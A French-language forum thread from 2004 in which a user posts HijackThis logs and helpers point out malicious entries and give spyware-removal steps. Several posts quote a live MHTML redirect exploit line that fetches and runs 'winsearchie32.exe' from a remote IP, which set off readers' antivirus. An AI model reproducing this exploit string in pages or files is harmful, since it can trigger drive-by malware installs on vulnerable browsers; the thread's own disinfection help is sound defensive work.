Rapport Hitjack

Rapport Hitjack - Sécurité - Windows & Software

Marsh Posté le 05-09-2004 à 21:08:20    

Merci de m'aider.....
 
Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Norton Internet Security\NISUM.EXE
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Norton Internet Security\ccPxySvc.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton Utilities\NPROTECT.EXE
C:\WINNT\Explorer.EXE
C:\PROGRA~1\SPEEDD~1\nopdb.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\SOUNDMAN.EXE
C:\PROGRA~1\WANADOO\CnxMon.exe
C:\PROGRA~1\WANADOO\taskbaricon.exe
C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Elaborate Bytes\CloneCD\CloneCDTray.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\PROGRA~1\MESSAG~1\StartMessager.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
C:\Program Files\WinTV\Ir.exe
C:\Program Files\Norton Utilities\SYSDOC32.EXE
C:\PROGRA~1\WANADOO\EspaceWanadoo.exe
C:\PROGRA~1\WANADOO\ComComp.exe
C:\PROGRA~1\WANADOO\Watch.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\Pasan1\Local Settings\Temp\Répertoire temporaire 2 pour hjt.zip\HijackThis.exe
 
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {2DB337DA-8231-43F8-AB27-91ABA104E389} - C:\WINNT\System32\mde.dll
O2 - BHO: (no name) - {549B5CA7-4A86-11D7-A4DF-000874180BB3} - (no file)
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)
O3 - Toolbar: Copernic Agent - {F2E259E8-0FC8-438C-A6E0-342DD80FA53E} - C:\Program Files\Copernic Agent\CopernicAgentExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [WooCnxMon] C:\PROGRA~1\WANADOO\CnxMon.exe
O4 - HKLM\..\Run: [WOOWATCH] C:\PROGRA~1\WANADOO\Watch.exe
O4 - HKLM\..\Run: [WOOTASKBARICON] C:\PROGRA~1\WANADOO\taskbaricon.exe
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINNT\system32\NeroCheck.exe
O4 - HKLM\..\Run: [CloneCDElbyCDFL] "C:\Program Files\Elaborate Bytes\CloneCD\ElbyCheck.exe" /L ElbyCDFL
O4 - HKLM\..\Run: [CloneCDTray] "C:\Program Files\Elaborate Bytes\CloneCD\CloneCDTray.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [MessagerStarter Wanadoo] C:\PROGRA~1\MESSAG~1\StartMessager.exe Messager Wanadoo
O4 - HKLM\..\Run: [ccApp] C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
O4 - HKLM\..\Run: [ccRegVfy] C:\Program Files\Fichiers communs\Symantec Shared\ccRegVfy.exe
O4 - Startup: PowerReg SchedulerV2.exe
O4 - Startup: heavy weather 2.0 beta release.lnk = C:\HeavyWeather\heavy weather.exe
O4 - Global Startup: AutoStart IR.lnk = C:\Program Files\WinTV\Ir.exe
O4 - Global Startup: Symantec Fax Starter Edition Port.lnk = E:\Bureautique\Office 2000\Office\1036\OLFSNT40.EXE
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Microsoft Office.lnk = E:\Bureautique\Office 2000\Office10\OSA.EXE
O4 - Global Startup: Norton System Doctor.lnk = C:\Program Files\Norton Utilities\SYSDOC32.EXE
O8 - Extra context menu item: Chercher avec Copernic Agent - C:\Program Files\Copernic Agent\Web\SearchExt.htm
O9 - Extra button: (no name) - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra 'Tools' menuitem: Démarrer Copernic Agent - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Copernic Agent - {688DC797-DC11-46A7-9F1B-445F4F58CE6E} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Wanadoo - {1462651F-F4BA-4C76-A001-C4284D0FE16E} - http://www.wanadoo.fr (file missing) (HKCU)
O16 - DPF: fdjeux - https://www.fdjeux.net/classes/fdjeux.cab
O16 - DPF: teleir_cert - https://static.ir.dgi.minefi.gouv.f [...] r_cert.cab
O16 - DPF: {11010101-1001-1111-1000-110112345678} - ms-its:mhtml:file://c:\nosuch.mht!http://69.50.179.52/winsearchie32.chm::/winsearchie32.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{DA621077-9973-4250-BBE7-0958E44BD96F}: NameServer = 80.10.246.134 80.10.246.7
O18 - Protocol: cdefs - {B5F329B4-2BBD-48F5-ADAF-9EAF2AFE37B3} - (no file)
O18 - Filter: text/html - {DA9BFF20-80CE-4D4B-95B4-35A0BDC38CB2} - C:\WINNT\System32\mde.dll
O18 - Filter: text/plain - {DA9BFF20-80CE-4D4B-95B4-35A0BDC38CB2} - C:\WINNT\System32\mde.dll
 

Reply

Marsh Posté le 05-09-2004 à 21:08:20   

Reply

Marsh Posté le 05-09-2004 à 21:23:14    

--------------------------1  
 
Télécharge CoolWebSchredder sur:  
 
http://www.lurkhere.com/~nicefiles/index.html  
Laisse-le en attente sur ton bureau.  
   
Munis-toi de la dernière version d'AdAware SE sur:  
http://lavasoft.element5.com/french/support/download/  
Pack français sur:  
http://www.webmatze.tk/  
télécharger->installer, mettre à jour, laisser en attente.  
 
 
-----------------------------2  
 
Redémarre en mode sans échec (en tapotant F8 au démarrage)  
 
Lance HijackThis.  
 
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html  
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html  
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html  
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html  
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html  
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = file://C:\DOCUME~1\Pasan1\LOCALS~1\Temp\sp.html  
O2 - BHO: (no name) - {2DB337DA-8231-43F8-AB27-91ABA104E389} - C:\WINNT\System32\mde.dll  
O2 - BHO: (no name) - {549B5CA7-4A86-11D7-A4DF-000874180BB3} - (no file)
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)  
O16 - DPF: {11010101-1001-1111-1000-110112345678} - ms-its:mhtml:file://c:\nosuch.mht!http://69.50.179.52/winsearchie32.chm::/winsearchie32.exe  
O18 - Protocol: cdefs - {B5F329B4-2BBD-48F5-ADAF-9EAF2AFE37B3} - (no file)  
O18 - Filter: text/html - {DA9BFF20-80CE-4D4B-95B4-35A0BDC38CB2} - C:\WINNT\System32\mde.dll  
O18 - Filter: text/plain - {DA9BFF20-80CE-4D4B-95B4-35A0BDC38CB2} - C:\WINNT\System32\mde.dll  
 
Coche ces lignes et clique "Fix checked".  
 
Toujours en mode sans échec:  
-Lance CoolWebSchredder.  
-Lance une analyse complète Ad-Aware SE. Sélectionne et supprime tt ce qu'il trouvera.  
 
--------------------------------3  
 
Redémarre en mode normal. Poste un nouvel HijackThis.
 
 

Reply

Marsh Posté le 05-09-2004 à 21:31:24    

ne pas oublier O4 - Startup: PowerReg SchedulerV2.exe  
 
http://www.pestpatrol.com/pestinfo [...] eduler.asp

Reply

Marsh Posté le 06-09-2004 à 13:16:51    

Merci Acrobaze
Merci Minipouss
 
Le nouvel HIJACKTHIS :
 
Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Norton Internet Security\NISUM.EXE
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Norton Internet Security\ccPxySvc.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton Utilities\NPROTECT.EXE
C:\PROGRA~1\SPEEDD~1\nopdb.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\Explorer.EXE
C:\WINNT\SOUNDMAN.EXE
C:\PROGRA~1\WANADOO\CnxMon.exe
C:\PROGRA~1\WANADOO\taskbaricon.exe
C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Elaborate Bytes\CloneCD\CloneCDTray.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\PROGRA~1\MESSAG~1\StartMessager.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
C:\Program Files\WinTV\Ir.exe
C:\Program Files\Norton Utilities\SYSDOC32.EXE
C:\DOCUME~1\Pasan1\LOCALS~1\Temp\Rar$EX00.937\HijackThis.exe
 
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Copernic Agent - {F2E259E8-0FC8-438C-A6E0-342DD80FA53E} - C:\Program Files\Copernic Agent\CopernicAgentExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [WooCnxMon] C:\PROGRA~1\WANADOO\CnxMon.exe
O4 - HKLM\..\Run: [WOOWATCH] C:\PROGRA~1\WANADOO\Watch.exe
O4 - HKLM\..\Run: [WOOTASKBARICON] C:\PROGRA~1\WANADOO\taskbaricon.exe
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINNT\system32\NeroCheck.exe
O4 - HKLM\..\Run: [CloneCDElbyCDFL] "C:\Program Files\Elaborate Bytes\CloneCD\ElbyCheck.exe" /L ElbyCDFL
O4 - HKLM\..\Run: [CloneCDTray] "C:\Program Files\Elaborate Bytes\CloneCD\CloneCDTray.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [MessagerStarter Wanadoo] C:\PROGRA~1\MESSAG~1\StartMessager.exe Messager Wanadoo
O4 - HKLM\..\Run: [ccApp] C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
O4 - HKLM\..\Run: [ccRegVfy] C:\Program Files\Fichiers communs\Symantec Shared\ccRegVfy.exe
O4 - HKLM\..\RunServices: [SchedulingAgent] C:\WINNT\System32\mstask.exe
O4 - Startup: PowerReg SchedulerV2.exe
O4 - Startup: heavy weather 2.0 beta release.lnk = C:\HeavyWeather\heavy weather.exe
O4 - Global Startup: AutoStart IR.lnk = C:\Program Files\WinTV\Ir.exe
O4 - Global Startup: Symantec Fax Starter Edition Port.lnk = E:\Bureautique\Office 2000\Office\1036\OLFSNT40.EXE
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Microsoft Office.lnk = E:\Bureautique\Office 2000\Office10\OSA.EXE
O4 - Global Startup: Norton System Doctor.lnk = C:\Program Files\Norton Utilities\SYSDOC32.EXE
O8 - Extra context menu item: Chercher avec Copernic Agent - C:\Program Files\Copernic Agent\Web\SearchExt.htm
O9 - Extra button: (no name) - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra 'Tools' menuitem: Démarrer Copernic Agent - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Copernic Agent - {688DC797-DC11-46A7-9F1B-445F4F58CE6E} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Wanadoo - {1462651F-F4BA-4C76-A001-C4284D0FE16E} - http://www.wanadoo.fr (file missing) (HKCU)
O16 - DPF: fdjeux - https://www.fdjeux.net/classes/fdjeux.cab
O16 - DPF: teleir_cert - https://static.ir.dgi.minefi.gouv.f [...] r_cert.cab
 
Merci d'avance...

Reply

Marsh Posté le 06-09-2004 à 13:23:22    

O4 - Startup: PowerReg SchedulerV2.exe  est toujours là pour le virer regarde le lien que je t'ai donné vers pestpatrol où ils expliquent ce qu'il faut faire. Si l'anglais te gêne dis le et je t'aide ;)

Reply

Marsh Posté le 06-09-2004 à 13:39:55    

pourquoi mon antivirus se declenche qd je vais sur ce post ? :??:


---------------
A 50 ans, si tu n'as mal absolument nul part c'est que t'es mort.
Reply

Marsh Posté le 06-09-2004 à 13:45:07    

:heink: il te dit quoi?

Reply

Marsh Posté le 06-09-2004 à 15:48:54    

Moi aussi et il me dit cheval de troie Exploit-MhtRedir.gen :??:

Reply

Marsh Posté le 06-09-2004 à 15:51:25    

c'est quoi vos antivirus?

Reply

Marsh Posté le 06-09-2004 à 15:53:59    

Viruscan entreprise 7.00 de Mcaffe

Reply

Marsh Posté le 06-09-2004 à 15:53:59   

Reply

Marsh Posté le 06-09-2004 à 16:06:36    

Viruscan entreprise 7.1 de Mcaffe


---------------
A 50 ans, si tu n'as mal absolument nul part c'est que t'es mort.
Reply

Marsh Posté le 06-09-2004 à 16:09:19    

ok j'ai demandé la vérification par d'autres personnes dans le topic modo

Reply

Marsh Posté le 06-09-2004 à 16:21:05    

Hu :hebe:
Sous IE (ben ouais sous firefox,la faille n'est pas exploitable :sol: ), j'ai une alerte reconnu en tant que Exploit-MhtRedir.gen
Viruscan v4.5.1
 

piouPiouM a écrit :

le coupable :

O16 - DPF: {11010101-1001-1111-1000-110112345678} - ms-its:mhtml:file://c:\nosuch.mht!http://69.50.179.52/winsearchie32.chm::/winsearchie32.exe




Message édité par piouPiouM le 06-09-2004 à 18:34:56

---------------
o(^_^o) Gimp4you : tutoriels pour Gimp 2 | Galerie (o^_^)o
Reply

Marsh Posté le 06-09-2004 à 18:23:24    

Donc, coche et fixe cette ligne:
O4 - Startup: PowerReg SchedulerV2.exe  
 
Utilises-tu \HeavyWeather?

Reply

Marsh Posté le 06-09-2004 à 21:29:36    

Excuse Acrobaze, mais j'utilise une carte Tuner Hauppauge avec l'appli. Scheduler.
 
Dois je virer la ligne quand meme?
 

Reply

Marsh Posté le 06-09-2004 à 21:34:16    

Oki. Regarde le lien donné par Minipouss:
http://www.pestpatrol.com/pestinfo [...] eduler.asp
 
Il y a bien:
profilepath+\start menu\programs\startup\powerreg schedulerv2.exe
 
Pour en être certain, recherche ce fichier powerreg schedulerv2.exe et vois s'il est lié vraiment à ta carte.
 
 


Message édité par acrobaze le 06-09-2004 à 21:34:55
Reply

Marsh Posté le 06-09-2004 à 21:36:10    

cette appli d'après ce qui est dit sur le web est un spyware réputé et répandu. Alors tu fais comme tu veux.
 
edit : grilled :D en tout cas aucune page web avec power scheduler et Hauppauge


Message édité par minipouss le 06-09-2004 à 21:38:13
Reply

Marsh Posté le 10-09-2004 à 10:45:49    

Je viens de faire un test avec FireFox et je n'ai plus le problème.  :bounce:   :sol:  
Merci qui ??? Merci crosoft  :pfff:  :kaola:

Reply

Marsh Posté le 04-10-2004 à 13:18:48    

Merci de m'aider pour ce rapport...
 
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Copernic Agent - {F2E259E8-0FC8-438C-A6E0-342DD80FA53E} - C:\Program Files\Copernic Agent\CopernicAgentExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [WooCnxMon] C:\PROGRA~1\WANADOO\CnxMon.exe
O4 - HKLM\..\Run: [WOOWATCH] C:\PROGRA~1\WANADOO\Watch.exe
O4 - HKLM\..\Run: [WOOTASKBARICON] C:\PROGRA~1\WANADOO\taskbaricon.exe
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINNT\system32\NeroCheck.exe
O4 - HKLM\..\Run: [CloneCDElbyCDFL] "C:\Program Files\Elaborate Bytes\CloneCD\ElbyCheck.exe" /L ElbyCDFL
O4 - HKLM\..\Run: [CloneCDTray] "C:\Program Files\Elaborate Bytes\CloneCD\CloneCDTray.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [MessagerStarter Wanadoo] C:\PROGRA~1\MESSAG~1\StartMessager.exe Messager Wanadoo
O4 - HKLM\..\Run: [ccApp] C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
O4 - HKLM\..\Run: [ccRegVfy] C:\Program Files\Fichiers communs\Symantec Shared\ccRegVfy.exe
O4 - HKCU\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe
O4 - Startup: heavy weather 2.0 beta release.lnk = C:\HeavyWeather\heavy weather.exe
O4 - Global Startup: AutoStart IR.lnk = C:\Program Files\WinTV\Ir.exe
O4 - Global Startup: Symantec Fax Starter Edition Port.lnk = E:\Bureautique\Office 2000\Office\1036\OLFSNT40.EXE
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Microsoft Office.lnk = E:\Bureautique\Office 2000\Office10\OSA.EXE
O4 - Global Startup: Norton System Doctor.lnk = C:\Program Files\Norton Utilities\SYSDOC32.EXE
O8 - Extra context menu item: Chercher avec Copernic Agent - C:\Program Files\Copernic Agent\Web\SearchExt.htm
O9 - Extra button: (no name) - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra 'Tools' menuitem: Démarrer Copernic Agent - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Copernic Agent - {688DC797-DC11-46A7-9F1B-445F4F58CE6E} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Wanadoo - {1462651F-F4BA-4C76-A001-C4284D0FE16E} - http://www.wanadoo.fr (file missing) (HKCU)
O16 - DPF: fdjeux - https://www.fdjeux.net/classes/fdjeux.cab
O16 - DPF: teleir_cert - https://static.ir.dgi.minefi.gouv.f [...] r_cert.cab
 

Reply

Marsh Posté le 04-10-2004 à 21:08:29    


Là, il n'y a rien de néfaste. Mais le rapport n'est pas entier.

Reply

Marsh Posté le 05-10-2004 à 07:23:10    

O9 - Extra button: Wanadoo - {1462651F-F4BA-4C76-A001-C4284D0FE16E} - http://www.wanadoo.fr (file missing) (HKCU)
O16 - DPF: fdjeux - https://www.fdjeux.net/classes/fdjeux.cab
O16 - DPF: teleir_cert - https://static.ir.dgi.minefi.gouv.f [...] r_cert.cab

Reply

Marsh Posté le 05-10-2004 à 18:27:21    


Ce n'est pas la peine.
- HijackThis bug parfois (he oui...) sur les O9, indiquant un fichier manquant, alors qu'il est présent. Donc, si le fichier n'est pas néfaste, autant s'abstenir de fixer la ligne.
- Pourquoi ces O16?
fdjeux.net  et  static.ir.dgi.minefi.gouv.fr  sont des sites pirates?

Reply

Marsh Posté le 07-10-2004 à 21:16:04    

Acrobaze a écrit :

Là, il n'y a rien de néfaste. Mais le rapport n'est pas entier.


 
Ok Merci Acrobaze...
 
Heu.... :o  J'ai oublié quoi???
 

Reply

Marsh Posté le 07-10-2004 à 22:44:26    


Tout le haut du rapport.  
C'est important car il y a des processus non lancés par des lignes 04.

Reply

Marsh Posté le 08-10-2004 à 22:10:28    

Voila...
 
Logfile of HijackThis v1.98.2
Scan saved at 22:07:17, on 08/10/2004
Platform: Windows XP  (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)
 
Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccEvtMgr.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Norton Internet Security\NISUM.EXE
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Norton Internet Security\ccPxySvc.exe
C:\Program Files\Norton Utilities\NPROTECT.EXE
C:\WINNT\System32\svchost.exe
C:\WINNT\SOUNDMAN.EXE
C:\PROGRA~1\WANADOO\CnxMon.exe
C:\PROGRA~1\WANADOO\taskbaricon.exe
C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Elaborate Bytes\CloneCD\CloneCDTray.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\PROGRA~1\MESSAG~1\StartMessager.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
C:\Program Files\WinTV\Ir.exe
C:\Program Files\Norton Utilities\SYSDOC32.EXE
C:\PROGRA~1\WANADOO\EspaceWanadoo.exe
C:\PROGRA~1\WANADOO\ComComp.exe
C:\PROGRA~1\WANADOO\Watch.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\WinRAR\WinRAR.exe
C:\DOCUME~1\Pasan1\LOCALS~1\Temp\Rar$EX00.938\HijackThis.exe
 
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.wanadoo.fr/go/page_recherche/
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.wanadoo.fr
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Copernic Agent - {F2E259E8-0FC8-438C-A6E0-342DD80FA53E} - C:\Program Files\Copernic Agent\CopernicAgentExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [WooCnxMon] C:\PROGRA~1\WANADOO\CnxMon.exe
O4 - HKLM\..\Run: [WOOWATCH] C:\PROGRA~1\WANADOO\Watch.exe
O4 - HKLM\..\Run: [WOOTASKBARICON] C:\PROGRA~1\WANADOO\taskbaricon.exe
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINNT\system32\NeroCheck.exe
O4 - HKLM\..\Run: [CloneCDElbyCDFL] "C:\Program Files\Elaborate Bytes\CloneCD\ElbyCheck.exe" /L ElbyCDFL
O4 - HKLM\..\Run: [CloneCDTray] "C:\Program Files\Elaborate Bytes\CloneCD\CloneCDTray.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [MessagerStarter Wanadoo] C:\PROGRA~1\MESSAG~1\StartMessager.exe Messager Wanadoo
O4 - HKLM\..\Run: [ccApp] C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
O4 - HKLM\..\Run: [ccRegVfy] C:\Program Files\Fichiers communs\Symantec Shared\ccRegVfy.exe
O4 - HKCU\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe
O4 - Startup: heavy weather 2.0 beta release.lnk = C:\HeavyWeather\heavy weather.exe
O4 - Global Startup: AutoStart IR.lnk = C:\Program Files\WinTV\Ir.exe
O4 - Global Startup: Symantec Fax Starter Edition Port.lnk = E:\Bureautique\Office 2000\Office\1036\OLFSNT40.EXE
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Microsoft Office.lnk = E:\Bureautique\Office 2000\Office10\OSA.EXE
O4 - Global Startup: Norton System Doctor.lnk = C:\Program Files\Norton Utilities\SYSDOC32.EXE
O8 - Extra context menu item: Chercher avec Copernic Agent - C:\Program Files\Copernic Agent\Web\SearchExt.htm
O9 - Extra button: (no name) - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra 'Tools' menuitem: Démarrer Copernic Agent - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Copernic Agent - {688DC797-DC11-46A7-9F1B-445F4F58CE6E} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
